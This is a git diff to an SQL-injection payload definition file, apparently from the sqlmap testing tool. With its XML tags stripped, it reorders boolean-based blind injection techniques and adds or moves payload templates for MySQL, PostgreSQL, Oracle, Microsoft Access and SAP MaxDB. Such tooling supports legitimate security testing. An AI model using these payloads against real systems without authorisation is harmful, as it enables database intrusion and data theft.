diff --git a/xml/payloads/01_boolean_blind.xml b/xml/payloads/01_boolean_blind.xml index 4b5fe3901..76a1aaadd 100644 --- a/xml/payloads/01_boolean_blind.xml +++ b/xml/payloads/01_boolean_blind.xml @@ -13,10 +13,10 @@ Tag: Valid values: 1: Boolean-based blind SQL injection 2: Error-based queries SQL injection - 3: UNION query SQL injection + 3: Inline queries SQL injection 4: Stacked queries SQL injection 5: Time-based blind SQL injection - 6: Inline queries SQL injection + 6: UNION query SQL injection Sub-tag: From which level check for this test. @@ -170,6 +170,22 @@ Tag: + + OR boolean-based blind - WHERE or HAVING clause + 1 + 1 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + + + OR [RANDNUM]=[RANDNUM1] + + + AND boolean-based blind - WHERE or HAVING clause (Generic comment) 1 @@ -187,6 +203,23 @@ Tag: + + OR boolean-based blind - WHERE or HAVING clause (Generic comment) + 1 + 2 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + -- + + + OR [RANDNUM]=[RANDNUM1] + + + AND boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 @@ -207,39 +240,6 @@ Tag: - - OR boolean-based blind - WHERE or HAVING clause - 1 - 1 - 3 - 1 - 2 - OR ([INFERENCE]) - - OR ([RANDNUM]=[RANDNUM]) - - - OR ([RANDNUM]=[RANDNUM1]) - - - - - OR boolean-based blind - WHERE or HAVING clause (Generic comment) - 1 - 2 - 3 - 1 - 2 - OR ([INFERENCE]) - - OR ([RANDNUM]=[RANDNUM]) - -- - - - OR ([RANDNUM]=[RANDNUM1]) - - - OR boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 @@ -247,13 +247,13 @@ Tag: 3 1 2 - OR ([INFERENCE]) + OR [INFERENCE] - OR ([RANDNUM]=[RANDNUM]) + OR [RANDNUM]=[RANDNUM] # - OR ([RANDNUM]=[RANDNUM1]) + OR [RANDNUM]=[RANDNUM1]
MySQL @@ -261,7 +261,47 @@ Tag: - MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) + AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) + 1 + 3 + 1 + 1 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + %16 + + + AND [RANDNUM]=[RANDNUM1] + +
+ Microsoft Access +
+ + + + OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) + 1 + 3 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + %16 + + + OR [RANDNUM]=[RANDNUM1] + +
+ Microsoft Access +
+ + + + MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause 1 2 1 @@ -395,35 +435,83 @@ Tag: - Generic boolean-based blind - Parameter replace + MySQL >= 5.0 boolean-based blind - Parameter replace + 1 + 1 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + +
+ MySQL + >= 5.0 +
+ + + + MySQL >= 5.0 boolean-based blind - Parameter replace (original value) 1 2 1 1,2,3 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) +
+ MySQL + >= 5.0 +
- Generic boolean-based blind - Parameter replace (original value) + MySQL < 5.0 boolean-based blind - Parameter replace + 1 + 2 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + +
+ MySQL + < 5.0 +
+ + + + MySQL < 5.0 boolean-based blind - Parameter replace (original value) 1 3 1 1,2,3 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) +
+ MySQL + < 5.0 +
@@ -505,7 +593,7 @@ Tag: MySQL boolean-based blind - Parameter replace (bool*int) 1 - 5 + 4 1 1,2,3 3 @@ -540,84 +628,6 @@ Tag:
- - MySQL >= 5.0 boolean-based blind - Parameter replace - 1 - 1 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - -
- MySQL - >= 5.0 -
- - - - MySQL >= 5.0 boolean-based blind - Parameter replace (original value) - 1 - 2 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - -
- MySQL - >= 5.0 -
- - - - MySQL < 5.0 boolean-based blind - Parameter replace - 1 - 3 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - -
- MySQL -
- - - - MySQL < 5.0 boolean-based blind - Parameter replace (original value) - 1 - 2 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - -
- MySQL -
- - PostgreSQL boolean-based blind - Parameter replace 1 @@ -660,7 +670,7 @@ Tag: PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES) 1 - 3 + 5 1 1,2,3 3 @@ -680,7 +690,7 @@ Tag: PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) 1 - 4 + 5 1 1,2,3 3 @@ -853,41 +863,9 @@ Tag: - + - Generic boolean-based blind - GROUP BY and ORDER BY clauses - 1 - 2 - 1 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) - - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END)) - - - - - Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value) - 1 - 3 - 1 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) - - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) - - - - - MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses + MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause 1 2 1 @@ -907,9 +885,9 @@ Tag: - MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (original value) + MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 - 4 + 3 1 2,3 1 @@ -927,7 +905,7 @@ Tag: - MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses + MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause 1 3 1 @@ -942,13 +920,14 @@ Tag:
MySQL + < 5.0
- MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (original value) + MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 - 5 + 4 1 2,3 1 @@ -961,13 +940,14 @@ Tag:
MySQL + < 5.0
- PostgreSQL boolean-based blind - GROUP BY and ORDER BY clauses + PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause 1 - 3 + 2 1 2,3 1 @@ -985,9 +965,9 @@ Tag: - PostgreSQL boolean-based blind - ORDER BY clauses (original value) + PostgreSQL boolean-based blind - ORDER BY clause (original value) 1 - 5 + 4 1 3 1 @@ -1008,10 +988,10 @@ Tag: It already works for ORDER BY because it accepts int whereas GROUP BY only accepts format [table].[column] so [ORIGVALUE] must where it is --> - + PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES) 1 - 3 + 5 1 3 @@ -1071,7 +1051,7 @@ Tag: - Oracle boolean-based blind - GROUP BY and ORDER BY clauses + Oracle boolean-based blind - ORDER BY, GROUP BY clause 1 3 1 @@ -1090,7 +1070,7 @@ Tag: - Oracle boolean-based blind - GROUP BY and ORDER BY clauses (original value) + Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 4 1 @@ -1109,9 +1089,9 @@ Tag: - Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses + Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause 1 - 3 + 4 1 2,3 1 @@ -1128,9 +1108,9 @@ Tag: - Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses (original value) + Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 - 4 + 5 1 2,3 1 @@ -1147,9 +1127,9 @@ Tag: - SAP MaxDB boolean-based blind - GROUP BY and ORDER BY clauses + SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause 1 - 3 + 4 1 2,3 1 @@ -1166,9 +1146,9 @@ Tag: - SAP MaxDB boolean-based blind - GROUP BY and ORDER BY clauses (original value) + SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value) 1 - 4 + 5 1 2,3 1 @@ -1183,13 +1163,13 @@ Tag: SAP MaxDB - + MySQL >= 5.0 boolean-based blind - Stacked queries 1 - 3 + 4 1 0 1 @@ -1210,7 +1190,7 @@ Tag: MySQL < 5.0 boolean-based blind - Stacked queries 1 - 4 + 5 1 0 1 @@ -1224,6 +1204,7 @@ Tag:
MySQL + < 5.0
@@ -1251,7 +1232,7 @@ Tag: PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES) 1 - 4 + 5 1 0 1 @@ -1335,7 +1316,7 @@ Tag: Microsoft Access boolean-based blind - Stacked queries 1 - 4 + 5 1 0 1